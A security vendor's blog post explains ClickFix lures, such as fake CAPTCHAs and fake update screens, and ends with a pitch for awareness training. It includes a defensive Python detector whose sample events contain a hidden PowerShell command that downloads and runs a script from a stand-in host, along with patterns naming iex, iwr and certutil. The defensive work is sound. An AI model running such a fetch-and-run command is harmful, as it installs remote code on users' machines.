ClickFix Attacks and the Rise of User-Initiated Compromise

User security awareness traditionally focuses on a narrow set of failure modes: things like don’t open unexpected email attachments or don’t enter your credentials into random websites. Those lessons have been drilled in repeatedly (and to a large extent, they’ve worked quite well). But with ClickFix attacks, there is a different social engineering exploitation at play.

ClickFix attacks

ClickFix is an increasingly popular and effective social engineering technique that convinces users to “solve” an apparent problem by running code that is in fact malicious on their own systems. This blog unpacks the mechanics of typical ClickFix campaigns and helps you decide on the best way for your business to prevent these attacks.

What Are ClickFix Attacks?

ClickFix campaigns typically present themselves as “quick fixes” for common computer issues like performance problems, missing drivers, browser errors, and verification failures. They entice the user to copy malicious code and run it on their computers.

The payloads that follow vary. Some lead to infostealers, while others deploy remote access tools or attempt to weaken security controls. But the delivery logic is always the same: persuade the victim to do the attacker’s work for them.

While the mechanics of ClickFix attacks are simple, the lures themselves vary. What they share is plausibility. Each one mimics a problem users already expect to encounter during routine computer use.

Common examples include:

  • Fake web browser alerts hosted on compromised websites, often warning of security, performance, or rendering issues
  • Spoofed CAPTCHA or human verification prompts, instructing users to complete an additional “step” to proceed
  • Impersonated Windows update or system error screens, designed to look indistinguishable from legitimate OS workflows
  • Browser instability or crash scenarios, sometimes deliberately induced, followed by instructions to “restore” functionality
  • Driver, plugin, or compatibility warnings, framed as routine fixes for missing or outdated components

ClickFix-style attacks were first observed in March 2024, initially as crude pop-ups on compromised sites, and gained significant momentum and widespread adoption by mid-2024. One example highlighted by Proofpoint from September 2024 was in German, targeting Swiss users of the e-commerce marketplace Ricardo. What has changed is not the underlying idea, but the quality and credibility of the presentation.

Attackers now invest heavily in visual accuracy, timing, and context. Fake Windows update screens closely mirror real system prompts. More advanced campaigns have used malicious browser extensions to deliberately crash Chrome, then present remediation steps that appear logical given the failure the user has just experienced.

What makes ClickFix attacks more than just another social engineering fad is how rapidly they have scaled across the threat landscape. According to telemetry in ESET’s H1 2025 Threat Report, ClickFix attacks increased by over 500% compared with the second half of 2024, rising from near zero to become the second most common attack vector after phishing and responsible for nearly 8% of all blocked attacks in that period.

Why ClickFix Attacks Work So Well

Several factors together form a perfect storm that explains why the ClickFix class of social engineering techniques is so effective.

They bypass controls by design

Many security controls are built to detect unauthorised activity. ClickFix generates authorised activity. Email gateways aren’t involved and malware scanners may have nothing to inspect. Endpoint tools can record the event, but the command itself is executed by the user through a trusted shell.
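Because the only artefact an endpoint tool sees is a shell started by the user, detection has to look at the shape of that launch. The script below is an added example (not part of the original post) that scores constructed, Sysmon-style process-creation records: an interactive parent such as explorer.exe (the Run dialog or File Explorer) starting a user shell or script host with hidden-window, encoded, download or remote-URL arguments. The field names, indicator weights, threshold and the four sample events are all assumptions made for this example, not telemetry from any real environment.

```python
import re

# Shells and script hosts a lure typically tells the user to paste a command into.
USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that imply a user-driven launch (Run dialog, Start menu, File Explorer).
INTERACTIVE_PARENTS = {"explorer.exe"}
# Script hosts that ordinary users almost never start by hand (weight is illustrative).
SCRIPT_HOST_WEIGHT = {"mshta.exe": 2}
# (weight, regex, description); weights are assumptions chosen for this example.
INDICATORS = [
    (2, r"(?i)-(w|windowstyle)\s+hidden", "hidden window"),
    (2, r"(?i)-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (1, r"(?i)-(nop|noprofile)\b", "profile bypass"),
    (2, r"(?i)\b(iex|invoke-expression)\b", "dynamic script execution"),
    (2, r"(?i)https?://", "remote URL on the command line"),
    (1, r"(?i)\b(iwr|invoke-webrequest|curl|certutil)\b", "download utility"),
]

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(event):
    """Return (score, reasons) for one process-creation event; (0, []) unless an
    interactive parent launched a user shell or script host."""
    parent, image = _basename(event["parent"]), _basename(event["image"])
    if parent not in INTERACTIVE_PARENTS or image not in USER_SHELLS:
        return 0, []
    hits = [(w, d) for w, pat, d in INDICATORS if re.search(pat, event["cmdline"])]
    if image in SCRIPT_HOST_WEIGHT:
        hits.append((SCRIPT_HOST_WEIGHT[image], f"{image} launched interactively"))
    return sum(w for w, _ in hits), [d for _, d in hits]

def detect_clickfix(events, threshold=4):
    """Return alert records for events scoring at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev["pid"], "score": score, "reasons": reasons})
    return alerts

# Constructed sample events (Sysmon-style process creation, not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": r"C:\Windows\explorer.exe",  # pasted into Win+R after a fake prompt
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -c "iwr http://example.invalid/fix.ps1 | iex"'},
    {"pid": 4188, "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",  # developer build
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe", "cmdline": "pwsh.exe -File .\\build.ps1"},
    {"pid": 4201, "parent": r"C:\Windows\explorer.exe",  # user simply opened a prompt
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 4233, "parent": r"C:\Windows\explorer.exe",  # script host pointed at a web page
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe https://example.invalid/verify"},
]
```

Calling `detect_clickfix(SAMPLE_EVENTS)` flags only the pasted PowerShell one-liner and the mshta launch; the developer's build script and the plain command prompt fall below the threshold, which is the distinction a rule like this has to preserve in environments where technical staff legitimately use these tools.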

They’re efficient

ClickFix is efficient. Attackers don’t need zero-days or complex tooling. They need a convincing presentation and context. As those lures improve through better design, timing, and alignment with real workflows, the success rate increases without requiring a corresponding increase in technical sophistication. That asymmetry is why ClickFix has spread so quickly. It’s cheap to run, hard to spot, and effective across a wide range of environments.

The attacks impersonate systems, not people

ClickFix campaigns don’t impersonate a specific individual. They impersonate infrastructure: browsers, operating systems, update mechanisms, verification flows, and error states. That distinction matters.

Social engineering training often focuses on teaching users to question unexpected emails from people. Users are far less likely to question instructions that appear to come from the system itself. A Windows update screen, a browser error, or a CAPTCHA-style prompt carries implicit authority because it mimics something the user encounters regularly.

They leverage legitimacy end-to-end

One of the most dangerous aspects of ClickFix is how legitimate it looks at every stage:

  • The entry point may be a normal Google search
  • The site may be a compromised but otherwise real domain
  • The instructions may reference well-known software or vendors
  • The action taken is deliberate and user-initiated

From the defender’s perspective, this produces activity that appears authorised and expected.

They exploit independence and helpfulness

What makes ClickFix campaigns particularly insidious is that they prey on traits organisations deliberately cultivate: independence, initiative, and problem-solving. Users are encouraged to unblock themselves, resolve minor issues quickly, and avoid unnecessary escalation to IT helpdesks. ClickFix weaponises that expectation.

By presenting both a plausible problem and an apparent solution, these lures create a sense of empowerment. The user is being asked to fix something. That dynamic reduces hesitation and makes reporting far less likely. From the user’s perspective, there’s no incident to flag; they’ve simply followed instructions and moved on. The user effectively infects the system themselves, using trusted tools and interfaces, in a way that looks intentional and legitimate.

Dealing with ClickFix Attacks

There are technical controls that can reduce exposure to ClickFix-style attacks. In tightly managed enterprise environments, admins can restrict access to system utilities, limit where executables can run from, or use Group Policy and endpoint controls to constrain how and where commands are executed.

In theory, these measures can narrow the blast radius, but in practice, they come with trade-offs. Many organisations rely on user autonomy to keep operations moving. Developers, engineers, and technical staff often need legitimate access to system tools. Overly restrictive policies risk breaking workflows, driving workarounds, or shifting risk elsewhere. More importantly, they don’t address the core problem of how these attacks exploit human behaviour.

Dealing with ClickFix ultimately means expanding what security awareness covers. Users need to understand that being asked to run commands, “complete verification,” or remediate issues outside established support channels is itself a risk signal. This is the case even when the request looks polished, familiar, or technically plausible. Without that understanding, no combination of endpoint or policy controls will reliably stop this class of attack.

If you want to improve the cybersecurity awareness level of your employees, DIESEC offers options including simulations of various phishing attacks and an information security awareness academy, where users take short, fun, engaging, and timely training courses on topics like ClickFix at regular intervals.

Contact us to learn more.